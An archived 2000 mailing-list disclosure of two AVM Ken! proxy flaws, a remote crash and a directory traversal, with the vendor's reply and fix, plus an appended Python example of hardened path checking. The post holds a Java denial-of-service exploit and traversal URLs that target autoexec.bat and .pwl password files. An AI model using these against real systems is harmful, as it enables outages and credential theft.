Subject: AVM Ken! + Statement
From: eAX [Teelicht] (eax@MAD.SCIENTIST.COM)
Date: Wed Apr 19 2000 - 10:52:17 CDT
- Next message: Narrow: "More vulnerabilities in FP"
- Previous message: Hans Aikema: "Re: netscape POP3 passwd and mails prefs"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Copy of the mail sent to AVM about the bugs
eAX
--------------
Dear AVM Team,
I found two serious (security) bugs in your Internet/ISDN proxy software AVM Ken!,
and I think I should inform you about them first.
While testing some things on a friend's system, which is running Ken!, I
noticed that I can crash Ken! remotely and force it to cut off all connections,
using a simple Telnet connection. I also found a way to download ANY file from
the Ken! server. When I say ANY file I mean ANY file!
The Denial of Service attack (crash):
I scanned the system for open ports and noticed that port 3128 was opened by Ken!.
I connected to it via a telnet client and sent some trash (at that point just interested
in the HTTP error message), but then I noticed that Ken! crashes with a page fault,
closes all connections and restarts.
I retested this with a Windows 98 and a Windows 2000 machine; both Ken!s crashed.
(Tested with Ken! 1.03.10 (German))
The download-everything bug (dangerous!!):
While looking for more bugs, I found out this:
type in your web browser:
http://targethost:3128/../../../../../autoexec.bat
or
http://localhost:3128/../../../../../windows/any_pwl_you_want.pwl
If Ken! is located in C:/Programme/Ken!/ or C:/Program Files/Ken!, this will
cause Ken! to send you the autoexec.bat, or any file you want (just change the URL).
I already cracked a test server to check how dangerous this security hole is, and
I found out that it is extremely dangerous for servers with important files or remote
access (Windows 2000 telnetd), because the person who set it up for me installed Ken!
in the default directory. Imagine what would happen if someone stole an important
database from a server running Ken!
The best thing to prevent misuse is to install Ken! into a different directory until the
bug is fixed (if Ken! isn't located in one of these directories, you can find the directory
by testing the path until you find autoexec.bat, but this is hard).
Retested on a LAN and over the Internet, with a Windows 98 and a Windows 2000 Server.
(Tested with Ken! 1.03.10 (German))
Your eAX (17 years old)
P.S. Attached to this message is EXPLOIT CODE written in Java, which can be used
on any OS. I also attached a part of the log file from Ken!.
P.P.S. Maybe I will post this to a security mailing list and rootshell in a few days.
I say a few days because I think you should have time to fix the bugs, if you haven't
done so already.
P.P.P.S. Better luck next time :)
P.P.P.P.S. Fritz Card is really cool!
----Exploit Code------
import java.net.Socket;
import java.io.IOException;
import java.io.PrintWriter;

/*
 * BARBIE - The AVM KEN! exploit
 *
 * This exploit causes a crash in the AVM KEN! ISDN Proxy software.
 * All connections will be cut off, but the server will restart again
 * a few seconds later.
 *
 * Tested with AVM KEN! Version 1.03.10 (german)
 */
class barbie {
    // Host name or IP of the machine running the Ken! proxy (port 3128).
    String address;

    // Open one TCP connection to the proxy port, send a single line of
    // garbage instead of an HTTP request, and disconnect. The proxy
    // process (KENPROXY.EXE) faults on the malformed input and is
    // restarted by kenserv, dropping every active connection.
    public void killken() {
        PrintWriter out = null;
        try {
            Socket connection = new Socket(address, 3128);
            System.out.println("");
            System.out.println("killing...");
            out = new PrintWriter(connection.getOutputStream(), true);
            out.println("Whooopppss_Ken_died");
            connection.close();
        } catch (IOException e) {
            System.out.println("");
            System.out.println(" Can't meet Ken! ");
        }
    }

    public static void main(String arguments[]) {
        barbie kk = new barbie();
        if (arguments.length < 1) {
            System.out.println("");
            System.out.println("usage: java barbie <address/ip>");
            System.exit(1);
        }
        kk.address = arguments[0];
        kk.killken();
    }
}
----------------------
------Log file--------
2000-04-12 20:36:40 keninet: CheckLimits charge(0,50000) time(0,180000) -->0 ACTIVE=TRUE): t1=0 t2=955564600
2000-04-12 20:40:14 kenserv: Process #6c is DOWN, Code=-1073741819
2000-04-12 20:40:14 kenserv: Process KENPROXY.EXE TERMINATED witout UNREGISTER_MSG (CRASH), Restarting immed
2000-04-12 20:40:14 kenserv: ----- Task PROXY(4) STOPPED, restart:1 immed.-----
2000-04-12 20:40:14 kenserv: DUMP: bShutdown=0
2000-04-12 20:40:14 kenserv: TASK CAPI state=0 hProc=0x0 tRest=0 bDelayedSt=0 nStopRetry=0 bStopFailed=0
2000-04-12 20:40:14 kenserv: TASK INET state=2 hProc=0x78 tRest=0 bDelayedSt=0 nStopRetry=0 bStopFailed=0
2000-04-12 20:40:14 kenserv: TASK PROXY state=0 hProc=0x0 tRest=1 bDelayedSt=0 nStopRetry=0 bStopFailed=0
2000-04-12 20:40:14 kenserv: TASK MAIL state=0 hProc=0x0 tRest=0 bDelayedSt=0 nStopRetry=0 bStopFailed=0
2000-04-12 20:40:14 kenserv: TASK DHCP state=0 hProc=0x0 tRest=0 bDelayedSt=0 nStopRetry=0 bStopFailed=0
2000-04-12 20:40:14 kenserv: TASK DNS state=0 hProc=0x0 tRest=0 bDelayedSt=0 nStopRetry=0 bStopFailed=0
2000-04-12 20:40:14 kenserv: TASK SOCKS state=2 hProc=0x5c tRest=0 bDelayedSt=0 nStopRetry=0 bStopFailed=0
2000-04-12 20:40:14 kenserv: TASK MAP state=2 hProc=0x74 tRest=0 bDelayedSt=0 nStopRetry=0 bStopFailed=0
2000-04-12 20:40:14 kenserv: Executing (KENPROXY.EXE) - OK
----------------------
Statement:
Here is the statement of the very friendly people from AVM:
eAX
- Statement (German original, translated) -
The described security hole is restricted exclusively to the company-internal
network. Towards the Internet, the company's own network is completely shielded
by KEN! (NAT). KEN! is not designed for large companies but for "small networks",
in which we assume manageable workgroups whose members can trust each other.
Apart from that, the described behaviour is correct, has also been known to us for
a few days, and is fixed in the newest version of KEN!, 1.04.32. As of today this
version is also officially available for free download on the ADC.
- Statement english (eAX's translation) -
The described security hole is only exploitable in local networks. The Ken! server secures itself against attacks from the Internet with a NAT shield. Ken! wasn't designed for enterprises but for small networks, where we can expect the people to trust each other.
The described errors exist and have been known for a few days. They were fixed in the latest version of Ken!, 1.04.32, which is now officially available for free download at the ADC.
-END-
P.S.: Thanks to the people from AVM for being so fast in fixing the bug, you are really cool ;)!
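The "download everything" bug above is a classic directory traversal: the proxy maps the request path onto its install directory and lets every "../" walk one level up. The following is an added example (not code from the report, from AVM, or from Ken! itself) that reproduces the faulty mapping next to a hardened one. It assumes the default install directory named in the report as the document root, and uses Python's ntpath module so Windows path semantics are simulated and it runs offline on any OS.

```python
import ntpath
from urllib.parse import unquote, urlsplit

# Default install directory named in the report (assumed; the proxy's real
# document root is not stated on the page).
INSTALL_DIR = r"C:\Program Files\Ken!"


def url_to_relative(url_path: str) -> str:
    """Take the path component of a request URL, decode %xx escapes
    (so %2e%2e is seen as '..' and %5c as '\\') and strip leading slashes."""
    return unquote(urlsplit(url_path).path).lstrip("/\\")


def vulnerable_map(url_path: str, root: str = INSTALL_DIR) -> str:
    """Naive file mapping: join the request path onto the install directory
    and let the path library collapse '..'.  Every '..' the client supplies
    walks one directory up, so enough of them reach the drive root, which is
    exactly what /../../../../../autoexec.bat does."""
    return ntpath.normpath(ntpath.join(root, url_to_relative(url_path)))


def hardened_map(url_path: str, root: str = INSTALL_DIR):
    """Same mapping, followed by a containment check: the normalised result
    must lie strictly below the normalised root, otherwise refuse (None).
    Comparing normalised, case-folded strings handles '/', '\\', '.', mixed
    case and an absolute path smuggled in the URL the way the Windows file
    system would, so there is no separate blacklist of '..' spellings."""
    candidate = vulnerable_map(url_path, root)
    root_n = ntpath.normcase(ntpath.normpath(root))
    if not ntpath.normcase(candidate).startswith(root_n + ntpath.sep):
        return None
    return candidate


if __name__ == "__main__":
    # Constructed request paths: one legitimate, two traversal variants.
    for req in ("/index.html",
                "/../../../../../autoexec.bat",
                "/..%5c..%5c..%5cwindows/user.pwl"):
        print(f"{req:40} naive -> {vulnerable_map(req)}")
        print(f"{'':40} safe  -> {hardened_map(req)}")
```

Note that the check is done on the fully normalised path, after URL decoding, rather than by searching the raw request for "..": that is what makes the encoded and backslash variants fall out for free, and it also refuses a request for "/" itself, since that resolves to the root directory rather than a file under it.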